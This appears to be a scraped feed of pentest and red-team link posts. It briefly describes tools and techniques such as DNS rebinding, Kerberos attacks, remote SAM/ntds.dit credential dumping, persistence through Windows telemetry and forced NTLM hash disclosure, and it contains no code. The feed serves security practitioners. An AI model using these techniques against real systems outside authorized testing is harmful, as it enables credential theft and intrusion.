🇺🇸 Memory Resident Implants Code injection is alive and well at BlueHat v18
Video: https://www.youtube.com/watch?v=02fL2xpR7IM …
Slides: https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well …
#pentest #redteaming #infosec #evasion
Video: https://www.youtube.com/watch?v=02fL2xpR7IM …
Slides: https://www.slideshare.net/MSbluehat/bluehat-v18-memory-resident-implants-code-injection-is-alive-and-well …
#pentest #redteaming #infosec #evasion
YouTube
BlueHat v18 || Memory Resident Implants Code injection is alive and well
Samit Anwer, Citrix
Each Android app runs in its own VM, with every VM allocated a limited heap size for creating new objects. Neither the app nor the OS differentiates between regular objects and objects that contain security sensitive information like…
Each Android app runs in its own VM, with every VM allocated a limited heap size for creating new objects. Neither the app nor the OS differentiates between regular objects and objects that contain security sensitive information like…
Mario & Luigi - Tools for sniffing Windows Named Pipes communication
https://github.com/OmerYa/Named-Pipe-Sniffer
#pentest #infosec
https://github.com/OmerYa/Named-Pipe-Sniffer
#pentest #infosec
GitHub
OmerYa/Named-Pipe-Sniffer
Mario & Luigi - Tools for sniffing Windows Named Pipes communication - OmerYa/Named-Pipe-Sniffer
Roll your own Ngrok with Nginx, Letsencrypt, and SSH reverse tunnelling
Ngrok is a fantastic tool for creating a secure tunnel from the public web to a machine behind NAT or a firewall. Sadly, it costs money and it’s proprietary. If you’re a developer, odds are that you’re already renting a server in the public cloud, so why not roll your own ngrok?
https://jerrington.me/posts/2019-01-29-self-hosted-ngrok.html
#pivoting #pentest #redteam
Ngrok is a fantastic tool for creating a secure tunnel from the public web to a machine behind NAT or a firewall. Sadly, it costs money and it’s proprietary. If you’re a developer, odds are that you’re already renting a server in the public cloud, so why not roll your own ngrok?
https://jerrington.me/posts/2019-01-29-self-hosted-ngrok.html
#pivoting #pentest #redteam
THE DANGER OF EXPOSING DOCKER.SOCK. Exposing /var/run/docker.sock could lead to full environment takeover.
https://dejandayoff.com/the-danger-of-exposing-docker.sock/
#docker #pentest
https://dejandayoff.com/the-danger-of-exposing-docker.sock/
#docker #pentest
Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
https://github.com/nccgroup/singularity
#dns #pentest
https://github.com/nccgroup/singularity
#dns #pentest
GitHub
GitHub - nccgroup/singularity: A DNS rebinding attack framework.
A DNS rebinding attack framework. Contribute to nccgroup/singularity development by creating an account on GitHub.
Password Spraying- Common mistakes and how to avoid them
When password spraying attacks are executed properly, coordinated and scoped properly during an authorized engagement — they can identify and illustrate the dangers of weak passwords and how extremely dangerous, even one legacy Internet facing endpoint can be.
https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
#pentest #redteaming
When password spraying attacks are executed properly, coordinated and scoped properly during an authorized engagement — they can identify and illustrate the dangers of weak passwords and how extremely dangerous, even one legacy Internet facing endpoint can be.
https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
#pentest #redteaming
Medium
Password Spraying- Common mistakes and how to avoid them
When password spraying attacks are executed properly, coordinated and scoped properly during an authorized engagement — they can identify…
Great collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources.
https://github.com/mgeeky/Penetration-Testing-Tools
#cheatsheets #pentest
https://github.com/mgeeky/Penetration-Testing-Tools
#cheatsheets #pentest
GitHub
GitHub - mgeeky/Penetration-Testing-Tools: A collection of more than 170+ tools, scripts, cheatsheets and other loots that I've…
A collection of more than 170+ tools, scripts, cheatsheets and other loots that I've developed over years for Red Teaming/Pentesting/IT Security audits purposes. - mgeeky/Penetration-Testing-Tools
Next Gen Phishing – Leveraging Azure Information Protection -
How to use Azure Information Protection (AIP) to improve phishing campaigns from the perspective of an attacker
https://www.trustedsec.com/2019/04/next-gen-phishing-leveraging-azure-information-protection/ …
#phishing #azure #pentest #redteam
How to use Azure Information Protection (AIP) to improve phishing campaigns from the perspective of an attacker
https://www.trustedsec.com/2019/04/next-gen-phishing-leveraging-azure-information-protection/ …
#phishing #azure #pentest #redteam
Vulmap is an open source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also they can be used for privilege escalation by pentesters/red teamers.
https://github.com/vulmon/Vulmap
#scanning #pentest
https://github.com/vulmon/Vulmap
#scanning #pentest
Penetration Testing (eCPPT) Notes and SOP
https://github.com/TacticThreat/PenetrationTesting-Notes
#cheatsheet #pentest #
https://github.com/TacticThreat/PenetrationTesting-Notes
#cheatsheet #pentest #
GitHub
GitHub - tacticthreat/PenetrationTesting-Playbook: Penetration Testing Notes and Playbook (PTP)
Penetration Testing Notes and Playbook (PTP). Contribute to tacticthreat/PenetrationTesting-Playbook development by creating an account on GitHub.
Osmedeus
- Fully automated offensive security tool for reconnaissance and vulnerability scanning. Osmedeus allows you automated run the collection of awesome tools to reconnaissance and vulnerability scanning against the target.https://github.com/j3ssie/Osmedeus
#recon #bugbounty #pentest
GitHub
GitHub - j3ssie/osmedeus: A Workflow Engine for Offensive Security
A Workflow Engine for Offensive Security. Contribute to j3ssie/osmedeus development by creating an account on GitHub.
Kerberos cheatsheet
A cheatsheet with commands that can be used to perform kerberos attacks:
- Bruteforcing
- ASREPRoast
- Kerberoasting
- Overpass The Hash/Pass The Key (PTK)
- Pass The Ticket (PTT)
- Silver / Golden ticket
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
#pentest #redteaming #kerberos #windows #ad
A cheatsheet with commands that can be used to perform kerberos attacks:
- Bruteforcing
- ASREPRoast
- Kerberoasting
- Overpass The Hash/Pass The Key (PTK)
- Pass The Ticket (PTT)
- Silver / Golden ticket
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
#pentest #redteaming #kerberos #windows #ad
Gist
A cheatsheet with commands that can be used to perform kerberos attacks
A cheatsheet with commands that can be used to perform kerberos attacks - kerberos_attacks_cheatsheet.md
Check-LocalAdminHash
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code.
https://github.com/dafthack/Check-LocalAdminHash
#redteaming #pentest #ad #windows
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code.
https://github.com/dafthack/Check-LocalAdminHash
#redteaming #pentest #ad #windows
GitHub
GitHub - dafthack/Check-LocalAdminHash: Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts…
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrat...
Docker for Pentesters
My hope in this post is to demonstrate some of my usecases and workflows, and illustrate how I think pentesters and security professionals in general can greatly benefit from Docker.
https://blog.ropnop.com/docker-for-pentesters/
#docker #pentest
My hope in this post is to demonstrate some of my usecases and workflows, and illustrate how I think pentesters and security professionals in general can greatly benefit from Docker.
https://blog.ropnop.com/docker-for-pentesters/
#docker #pentest
ropnop blog
Docker for Pentesters
Docker has become such an integral part of my worfklow recently. These examples should demonstrate how Docker can help you be a more efficient pentester
Python for Pentesters
Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.
https://github.com/ustayready/python-pentesting
#python #tools #pentest
Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.
https://github.com/ustayready/python-pentesting
#python #tools #pentest
GitHub
GitHub - ustayready/python-pentesting: Just a repo of random Python scripts to get pentesters started with the Python language…
Just a repo of random Python scripts to get pentesters started with the Python language on engagements. - ustayready/python-pentesting
Extracting credentials from a remote Windows system - Living off the Land
Recently we performed a red teaming engagement where we wanted to dump the credentials from a remote host. We got the credentials of a user which has administrative privileges on the victim host and wanted to get more credentials from that host. Because we felt that the blue team was closely observing the environment this needed to be done in a stealthy manner and preferably only involving native Windows tooling. That is when we came up with the following approach in order to obtain a remote system’s SYSTEM, SECURITY and SAM files from %SystemRoot%\System32\Config making use of WMI and SMB. This approach can also be used to obtain the ntds.dit file from a Domain Controller in order to obtain the credentials of the complete organization.
https://bitsadm.in/blog/extracting-credentials-from-remote-windows-system
#windows #redteaming #pentest #evasion
Recently we performed a red teaming engagement where we wanted to dump the credentials from a remote host. We got the credentials of a user which has administrative privileges on the victim host and wanted to get more credentials from that host. Because we felt that the blue team was closely observing the environment this needed to be done in a stealthy manner and preferably only involving native Windows tooling. That is when we came up with the following approach in order to obtain a remote system’s SYSTEM, SECURITY and SAM files from %SystemRoot%\System32\Config making use of WMI and SMB. This approach can also be used to obtain the ntds.dit file from a Domain Controller in order to obtain the credentials of the complete organization.
https://bitsadm.in/blog/extracting-credentials-from-remote-windows-system
#windows #redteaming #pentest #evasion
Attacking Active Directory Group Managed Service Accounts (GMSAs)
User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. This means that the GMSA has to have security principals explicitly delegated to have access to the clear-text password. This is where it can get tricky.
https://adsecurity.org/?p=4367
#ad #windows #pentest
User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically changed. This means that the GMSA has to have security principals explicitly delegated to have access to the clear-text password. This is where it can get tricky.
https://adsecurity.org/?p=4367
#ad #windows #pentest
Active Directory Security
Attacking Active Directory Group Managed Service Accounts (GMSAs)
In May 2020, I presented some Active Directory security topics in a Trimarc Webcast called "Securing Active Directory: Resolving Common Issues" and included some information I put together relating to the security of AD Group Managed Service Accounts (GMSA).…
ABUSING WINDOWS TELEMETRY FOR PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. The process outlined here affects Windows machines from 2008R2/Windows 7 through 2019/Windows 10.
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
#windows #persitence #redteaming #pentest
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. The process outlined here affects Windows machines from 2008R2/Windows 7 through 2019/Windows 10.
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/
#windows #persitence #redteaming #pentest
TrustedSec
Abusing Windows Telemetry for Persistence
ntlm_theft: A file payload generator for forced ntlm hash disclosure
Greetings fellow security enthusiast! Today I want to introduce you to a new security tool I’ve written called ntlm_theft, which is now available on GitHub. It’s a tool which generates a number of known filetypes (18 at time of writing), which can be used by an attacker to trick users into disclosing their NetNTLMv2 hashes.
> https://medium.com/greenwolf-security/ntlm-theft-a-file-payload-generator-for-forced-ntlm-hash-disclosure-2d5f1fe5b964
> https://github.com/Greenwolf/ntlm_theft
#windows #ntlm #tools #pentest
Greetings fellow security enthusiast! Today I want to introduce you to a new security tool I’ve written called ntlm_theft, which is now available on GitHub. It’s a tool which generates a number of known filetypes (18 at time of writing), which can be used by an attacker to trick users into disclosing their NetNTLMv2 hashes.
> https://medium.com/greenwolf-security/ntlm-theft-a-file-payload-generator-for-forced-ntlm-hash-disclosure-2d5f1fe5b964
> https://github.com/Greenwolf/ntlm_theft
#windows #ntlm #tools #pentest
Medium
ntlm_theft: A file payload generator for forced ntlm hash disclosure
Learn how ntlm_theft works and how to use it